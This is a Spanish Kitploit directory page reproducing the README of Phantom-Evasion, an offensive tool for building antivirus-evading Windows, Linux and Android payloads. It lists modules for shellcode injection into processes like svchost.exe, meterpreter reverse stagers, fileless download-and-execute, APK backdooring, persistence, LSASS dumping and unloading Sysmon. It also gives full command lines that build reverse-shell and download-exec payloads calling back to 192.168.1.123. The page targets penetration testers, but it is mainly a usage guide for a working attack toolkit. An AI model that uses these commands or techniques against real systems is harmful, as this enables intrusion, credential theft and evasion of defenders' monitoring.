Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Phantom-Evasion — Herramienta de evasión de antivirus en Python | Kitploit
Herramientas/GitHubGitHub/oddcod3/phantom-evasion
Escalada de PrivilegiosAnálisis Dinámico (Sandboxing)Frameworks de ExploitsGeneración de PayloadsMecanismos de PersistenciaShellcodePost-ExplotaciónGeneración de ShellcodeDesarrollo de PayloadsArchived
GitHuboddcod3/phantom-evasion

Phantom-Evasion

1.4k3406hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramienta de evasión de antivirus en Python

Ver Repositorio

PHANTOM EVASION 3.0

Phantom-Evasion es una herramienta de evasión de antivirus escrita en Python (compatible tanto con Python como con Python3) capaz de generar ejecutables (casi) totalmente indetectables incluso con los payloads de msfvenom x86 más comunes.

Los siguientes sistemas operativos soportan oficialmente la configuración automática:

  1. Kali Linux
  2. Parrot Security

Los siguientes sistemas operativos probablemente soportan la configuración automática pero requieren instalación manual de metasploit-framework:

  1. OSX (probado en Catalina)
  2. Ubuntu
  3. Linux Mint
  4. Elementary
  5. Deepin
  6. otras distribuciones Debian
  7. Centos
  8. Fedora
  9. Blackarch

Los siguientes sistemas operativos requieren configuración manual:

  1. Windows 10

Simplemente clone con git o descargue y descomprima la carpeta de Phantom-Evasion.

Configuración:

Configuración automática, abra una terminal y ejecute:

root@kitploit:~
python3 phantom-evasion.py --setup

o:

root@kitploit:~
chmod +x ./phantom-evasion.py

./phantom-evasion.py --setup

o inicie phantom-evasion en modo interactivo y seleccione la opción 7

Dependencias (solo para configuración manual)

  1. metasploit-framework
  2. mingw-w64 (cygwin en windows)
  3. gcc-multilib
  4. apktool
  5. apksigner
  6. strip
  7. osslsigncode

CMDLINE/INTERACTIVO:

  1. Inicie phantom-evasion en modo interactivo:
root@kitploit:~
python3 phantom-evasion.py

o:

root@kitploit:~
./phantom-evasion.py
  1. De lo contrario, para ver las opciones del modo cmdline:
root@kitploit:~
python3 phantom-evasion.py --help

o:

root@kitploit:~
./phantom-evasion.py --help

MÓDULOS DE WINDOWS

-Cada módulo C de payload de Windows puede compilarse (soporta tanto x86 como x64) como EXE o DLL/ReflectiveDLL.

-Inyección de código basura aleatoria (se puede configurar intensidad, frecuencia y probabilidad de reinyección) y técnicas de evasión de antivirus de Windows (se puede configurar la frecuencia).

-Cifrado de shellcode/archivo Multibyte Xor/Vigenere compatible tanto en módulos de inyección de shellcode como de Download Exec.

-Se soporta Ntdll unhookapi y técnica de enmascaramiento de proceso Peb.

-Amplia gama de modos de ejecución soportados (tanto local como remoto).

-Amplia gama de modos de asignación de memoria de payload (Virtual_RWX, Virtual_RW/RX, Virtual_RW/RWX, Heap_RWX).

-Se puede configurar la carga dinámica de API de Windows.

-Se soporta suplantador y firmante de certificados.

-Strip ejecutable (https://en.wikipedia.org/wiki/Strip_(Unix))

Inyección de Shellcode C de Windows

Se soportan payloads de Windows de msfvenom y shellcode personalizado. El shellcode puede almacenarse como recurso y recuperarse en tiempo de ejecución con la API FindResource.

Cifrado de shellcode soportado:

root@kitploit:~
1.ninguno

2.Multibyte-Xor

3.Double-key Multibyte-Xor

4.Vigenere

5.Double-key Vigenere
  1. El método de ejecución local puede ser uno de los siguientes:

    Thread

    APC

    El modo de asignación de memoria local puede ser uno de los siguientes:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

  2. El método de ejecución remota puede ser uno de los siguientes:

    ThreadExecutionHijack (abreviado TEH)

    Processinject (abreviado PI)

    APCSpray (abreviado APCS)

    EarlyBird (abreviado EB)

    EntryPointHijack (abreviado EPH)

    El modo de asignación de memoria remota puede ser uno de los siguientes:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

Stager de meterpreter en C puro para Windows (C)

Módulos de stager de meterpreter en C puro (TCP/HTTP/HTTPS) compatibles con msfconsole y cobalt strike beacon. (reverse_tcp/reverse_http/reverse_https)

Usando el modo cmdline:

root@kitploit:~
reverse_tcp c stager es WRT

reverse_http c stager es WRH

reverse_https c stager es WRS
  1. El método de ejecución local puede ser uno de los siguientes:

    Thread

    APC

    El modo de asignación de memoria local puede ser uno de los siguientes:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

Windows C Download-Exec SinEscribirEnDisco

Descarga exe/dll desde la URL proporcionada en memoria y ejecuta/carga en un proceso remoto (sin escribir en disco).

Descarga cifrada de EXE/DLL soportada:

root@kitploit:~
1.ninguno
                                 
2.Multibyte-Xor
                                 
3.Double-key Multibyte-Xor
                               
4.Vigenere
                                
5.Double-key Vigenere

La DLL/EXE cifrada se guardará como nombrearchivooriginal + "crypt" + ".dll" o ".exe"; esta es la que se descargará.

  1. Windows DownloadExecExe SinEscribirEnDisco (WDE usando modo cmdline):

    El método de ejecución remota puede ser uno de los siguientes:

    ProcessHollowing (abreviado PH)

  2. Windows DownloadExecDll SinEscribirEnDisco (WDD usando modo cmdline):

    El método de carga remota puede ser uno de los siguientes:

    ReflectiveDll (abreviado RD)

    RDAPC (ReflectiveDllAPC)

    ManualMap (abreviado MM) ---> solo x86

PAYLOADS DE LINUX

Módulo de Inyección de Shellcode para Linux (C)

Se soportan payloads de Linux de msfvenom y shellcodes personalizados.

PAYLOADS DE ANDROID

  1. Backdoor ofuscado de Android con msfvenom:

    Ofusca payloads de msfvenom y reconstruye (smali/baksmali) con apktool. El payload ofuscado puede usarse para backdoor en archivos apk benignos.

MÓDULOS DE PERSISTENCIA

  1. Persistencia en Windows RegCreateKeyExW Agregar clave de registro (C) El ejecutable compilado debe subirse a la máquina objetivo y ejecutarse especificando la ruta completa al archivo que se agregará al inicio como argumento.

  2. Persistencia en Windows REG Agregar clave de registro (CMD) Este módulo genera payloads de persistencia en línea de comandos (Agregar clave de registro mediante REG.exe).

  3. Persistencia en Windows Mantener proceso vivo (C) El ejecutable compilado debe subirse a la máquina objetivo y ejecutarse. Usa CreateToolSnapshot, ProcessFirst y ProcessNext para verificar si el proceso especificado está vivo cada X segundos (si no, crea un nuevo proceso usando la API WinExec)

  4. Persistencia en Windows Schtasks (CMD)

    Este módulo genera payloads de persistencia en línea de comandos (usando Schtasks.exe).

  5. Persistencia en Windows Crear servicio (CMD)

    Este módulo genera payloads de persistencia en línea de comandos (usando sc.exe).

MÓDULOS DE ESCALADA DE PRIVILEGIOS

  1. Windows DuplicateTokenEx (C)

    Crea un nuevo proceso con un token clonado de otro proceso. El ejecutable compilado debe subirse a la máquina objetivo y ejecutarse.

MÓDULOS DE POSTEXPLOTACIÓN

  1. Windows Unload Sysmon (C) Descarga el controlador sysmon, lo que hace que el sistema deje de registrar los registros de eventos de sysmon. El ejecutable compilado debe subirse a la máquina objetivo y ejecutarse.

  2. Windows Unload Sysmon (CMD) Descarga el controlador sysmon, lo que hace que el sistema deje de registrar los registros de eventos de sysmon.

  3. Windows Attrib ocultar archivo (CMD) Usa attrib para ocultar archivo

  4. Windows SetFileAttribute oculto (C) Oculta archivo usando la API SetFileAttribute El ejecutable compilado debe subirse a la máquina objetivo y ejecutarse.

  5. Windows DumpLsass (C) Vuelca Lsass usando la API MiniWriteDumpWrite. El ejecutable compilado debe subirse a la máquina objetivo y ejecutarse.

  6. Windows DumpLsass (CMD)

    Vuelca Lsass desde la línea de comandos.

Ejemplos de modo cmdline de Phantom-Evasion:

  1. inyección de shellcode de Windows, salida exe firmado con certificado https suplantado, método de ejecución local: Thread, memoria: Virtual_RWX, cifrado: vigenere
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 192.168.1.123 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o filename.exe
  1. inyección de shellcode x64 de Windows, salida como dll reflectiva, método de ejecución remota: ProcessInject (PI), memoria: Virtual_RW/RX, proceso objetivo: SkypeApp.exe, cifrado: xor de doble clave
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp SkypeApp.exe -i PI -e 3 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -R -o filename.dll
  1. inyección de shellcode x64 de Windows, salida como dll con strip, shellcode almacenado como recurso, método de ejecución remota: EarlyBird (EB), memoria: Virtual_RW/RX, proceso objetivo: svchost.exe, cifrado: xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp svchost.exe -i EB -e 2 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -res -S -o filename.dll
  1. stager reverse https x64 de Windows, salida como dll con strip, método de ejecución local: Thread, memoria: Heap_RWX
root@kitploit:~
python3 phantom-evasion.py -m WRS -a x64 -H 192.168.1.123 -P 4444 -i Thread -mem Heap_RWX -j 1 -J 15 -jr 0 -E 5 -f dll -S -o filename.dll
  1. downloadexec dll x86 de Windows, salida como exe con strip, método de ejecución remota: ManualMap (MM), proceso objetivo: OneDrive.exe, tamaño de descarga 1000000 bytes
root@kitploit:~
python3 phantom-evasion.py -m WDD -U http://192.168.1.123/payload.dll -i MM -tp OneDrive.exe -ds 1000000  -j 10 -J 10 -jr 0 -E 10 -f exe -S -o filename.exe

  1. downloadexec exe x64 de Windows, salida como dll reflectiva con strip, método de ejecución remota: ProcessHollowing (PH), proceso objetivo: svchost.exe, tamaño de descarga 1000000 bytes
root@kitploit:~
python3 phantom-evasion.py -m WDE -U http://192.168.1.123/payloadcrypt.exe -e 4 -ef payload.exe -i PH -tp svchost.exe -ds 1000000  -j 1 -J 5 -jr 0 -E 3 -f dll -R -S -o filename.dll

Licencia

GPLv3.0

Créditos y recursos útiles

https://github.com/stephenfewer/ReflectiveDLLInjection

https://github.com/rsmudge/metasploit-loader

https://ired.team

https://github.com/theevilbit/injection

http://www.rohitab.com/discuss/topic/40761-manual-dll-injection/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf

Descargar herramienta